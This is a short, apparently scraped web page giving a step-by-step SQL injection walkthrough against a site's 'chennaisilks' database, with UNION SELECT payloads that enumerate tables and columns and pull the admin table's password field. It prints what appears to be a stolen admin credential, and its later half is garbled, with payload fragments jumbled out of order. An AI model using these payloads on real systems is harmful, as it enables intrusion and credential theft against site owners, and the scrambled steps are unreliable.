Step 1: Finding Vulnerable Link

id=3 Add ' After id=3 If Error is shown or blank page then site is Vulnerable Step 2: Finding Vulnerable Columns order by 8 -if again error is shown or blank page occured then Vulnerable columns are 7. Step 3: Finding Number of Vulnerable Columns: union all select 1,2,3,4,5,6,7 -to SQL Injection.

if number 2 is shown then this column can give us Step 4 Finding Database union all select 1,database(),3,4,5,6,7 -chennaisilks Step 5: Finding Table Names: union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema='chennaisilks' -Step 6: Finding Column Names:

database,tables & columns

union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='chennaisilks' -Admin table is admin

6.php .3.4.php?id=3 union all select admin_pwd from admin -Step 7: finding Admin Link: www.aspx add ' or /* or ') In case of .add ' after id=3 .user_id.5.7 from admin -union all select 1.php?id=3 union all select 1.asp use /* for ending series of .7 from admin -admin:jan10ecom10jan www.5.3.asp add ' or /* or ') .6.Admin Columns are admin_id user_id admin_pwd admin_email admin_last_login admin_ip Step 6: Finding Admin username & password:

Sign up to vote on this title
UsefulNot useful